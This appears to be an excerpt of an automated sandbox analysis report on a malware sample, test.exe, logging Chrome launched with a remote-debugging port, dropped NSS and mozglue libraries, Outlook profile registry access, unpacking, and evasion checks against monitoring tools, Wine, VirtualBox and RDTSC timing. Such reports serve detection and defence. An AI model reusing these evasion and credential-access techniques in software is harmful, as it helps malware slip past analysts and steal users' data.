              Source: C:\Users\user\Desktop\test.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2288,i,7698725374925482900,7061072673800453571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2320 /prefetch:3Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: mozglue.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\test.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: test.exeStatic file information: File size 1784320 > 1048576
              Source: test.exeStatic PE information: Raw size of rygczwdk is bigger than: 0x100000 < 0x199400
              Source: Binary string: mozglue.pdbP source: test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\test.exeUnpacked PE file: 0.2.test.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rygczwdk:EW;wsyxmuzr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rygczwdk:EW;wsyxmuzr:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCB3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6CCB3480
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: test.exeStatic PE information: real checksum: 0x1c3886 should be: 0x1c3647
              Source: test.exeStatic PE information: section name:
              Source: test.exeStatic PE information: section name: .idata
              Source: test.exeStatic PE information: section name:
              Source: test.exeStatic PE information: section name: rygczwdk
              Source: test.exeStatic PE information: section name: wsyxmuzr
              Source: test.exeStatic PE information: section name: .taggant
              Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
              Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
              Source: msvcp140.dll.0.drStatic PE information: section name: .didat
              Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
              Source: nss3.dll.0.drStatic PE information: section name: .00cfg
              Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
              Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCEB536 push ecx; ret 0_2_6CCEB549
              Source: test.exeStatic PE information: section name: rygczwdk entropy: 7.954237174992683
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\test.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\test.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\test.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\test.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\test.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\test.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\test.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\test.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\test.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD155F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6CD155F0

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\test.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: D00291 second address: D00297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: D00297 second address: D0029B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: D0029B second address: D002C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F403C75C8FDh 0x00000011 jmp 00007F403C75C8FFh 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: D002C4 second address: CFFB02 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a sub esi, dword ptr [ebp+122D372Eh] 0x00000010 mov ecx, esi 0x00000012 popad 0x00000013 push dword ptr [ebp+122D0E95h] 0x00000019 sub dword ptr [ebp+122D30A0h], esi 0x0000001f call dword ptr [ebp+122D1E95h] 0x00000025 pushad 0x00000026 xor dword ptr [ebp+122D1D84h], ecx 0x0000002c xor eax, eax 0x0000002e cmc 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 mov dword ptr [ebp+122D2A36h], edx 0x00000039 mov dword ptr [ebp+122D3716h], eax 0x0000003f pushad 0x00000040 xor dword ptr [ebp+122D2A36h], edx 0x00000046 sub ecx, dword ptr [ebp+122D3786h] 0x0000004c popad 0x0000004d mov esi, 0000003Ch 0x00000052 mov dword ptr [ebp+122D1D84h], edi 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c jnl 00007F403D12A5C4h 0x00000062 lodsw 0x00000064 pushad 0x00000065 jmp 00007F403D12A5C2h 0x0000006a xor dword ptr [ebp+122D2A36h], edx 0x00000070 popad 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 pushad 0x00000076 jmp 00007F403D12A5C8h 0x0000007b je 00007F403D12A5BCh 0x00000081 mov dword ptr [ebp+122D2A36h], esi 0x00000087 popad 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c clc 0x0000008d push eax 0x0000008e push esi 0x0000008f push eax 0x00000090 push edx 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: CFFB02 second address: CFFB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E6B73A second address: E6B740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E6B740 second address: E6B749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E6B749 second address: E6B75A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7994F second address: E79958 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E79958 second address: E79964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F403D12A5B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7A05F second address: E7A066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7A066 second address: E7A06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7A06C second address: E7A071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7DB02 second address: E7DB3E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 7EBD73EDh 0x00000012 or dword ptr [ebp+122D368Ah], ecx 0x00000018 lea ebx, dword ptr [ebp+12451991h] 0x0000001e add esi, dword ptr [ebp+122D379Ah] 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 je 00007F403D12A5B6h 0x0000002e jmp 00007F403D12A5BDh 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7DB3E second address: E7DB53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F403C75C900h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7DBAB second address: E7DBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7DBB3 second address: E7DC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F403C75C8F6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 jno 00007F403C75C8FCh 0x00000017 mov ecx, dword ptr [ebp+122D380Ah] 0x0000001d push 6BDDE3F3h 0x00000022 pushad 0x00000023 jmp 00007F403C75C906h 0x00000028 jp 00007F403C75C90Bh 0x0000002e popad 0x0000002f xor dword ptr [esp], 6BDDE373h 0x00000036 mov di, cx 0x00000039 push 00000003h 0x0000003b call 00007F403C75C8FBh 0x00000040 pushad 0x00000041 mov dword ptr [ebp+122D3098h], edi 0x00000047 mov dword ptr [ebp+122D3014h], ecx 0x0000004d popad 0x0000004e pop ecx 0x0000004f push 00000000h 0x00000051 mov edx, dword ptr [ebp+122D3A1Eh] 0x00000057 push 00000003h 0x00000059 stc 0x0000005a push FBACFDDFh 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push edi 0x00000064 pop edi 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7DC4A second address: E7DC5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7DD30 second address: E7DD34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7DD34 second address: E7DDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 4FC951AAh 0x0000000e xor dword ptr [ebp+122D29D5h], eax 0x00000014 push 00000003h 0x00000016 add esi, dword ptr [ebp+122D38EEh] 0x0000001c push 00000000h 0x0000001e movzx edx, cx 0x00000021 mov si, ax 0x00000024 push 00000003h 0x00000026 pushad 0x00000027 ja 00007F403D12A5BCh 0x0000002d mov dword ptr [ebp+122D1C45h], eax 0x00000033 popad 0x00000034 push E4EECDB1h 0x00000039 je 00007F403D12A5C9h 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 jmp 00007F403D12A5BFh 0x00000047 popad 0x00000048 xor dword ptr [esp], 24EECDB1h 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 call 00007F403D12A5B8h 0x00000057 pop esi 0x00000058 mov dword ptr [esp+04h], esi 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc esi 0x00000065 push esi 0x00000066 ret 0x00000067 pop esi 0x00000068 ret 0x00000069 clc 0x0000006a mov esi, dword ptr [ebp+122D37BAh] 0x00000070 lea ebx, dword ptr [ebp+124519A5h] 0x00000076 mov ch, ah 0x00000078 push eax 0x00000079 jbe 00007F403D12A5C0h 0x0000007f pushad 0x00000080 push eax 0x00000081 pop eax 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E5E037 second address: E5E04E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C903h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E5E04E second address: E5E089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 jmp 00007F403D12A5C8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F403D12A5C3h 0x00000014 jns 00007F403D12A5B6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9AE8D second address: E9AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C904h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9AEA5 second address: E9AEA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9AEA9 second address: E9AEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9AEB7 second address: E9AEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9AEBB second address: E9AEC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9AEC1 second address: E9AECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F403D12A5B6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9AECD second address: E9AEE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C907h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B466 second address: E9B470 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B470 second address: E9B49D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F403C75C8FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jp 00007F403C75C8F6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 jmp 00007F403C75C8FFh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B49D second address: E9B4A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B84F second address: E9B855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B855 second address: E9B870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403D12A5C7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B870 second address: E9B89B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F403C75C909h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F403C75C8F6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B89B second address: E9B89F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B89F second address: E9B8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C902h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F403C75C905h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F403C75C907h 0x00000018 jmp 00007F403C75C904h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B8FB second address: E9B900 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BA80 second address: E9BAA4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F403C75C8FCh 0x00000008 jnc 00007F403C75C8F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F403C75C900h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BBEA second address: E9BBEF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BBEF second address: E9BC14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F403C75C90Ah 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BC14 second address: E9BC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BC1A second address: E9BC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BC1E second address: E9BC22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BED7 second address: E9BEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BEDD second address: E9BEE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
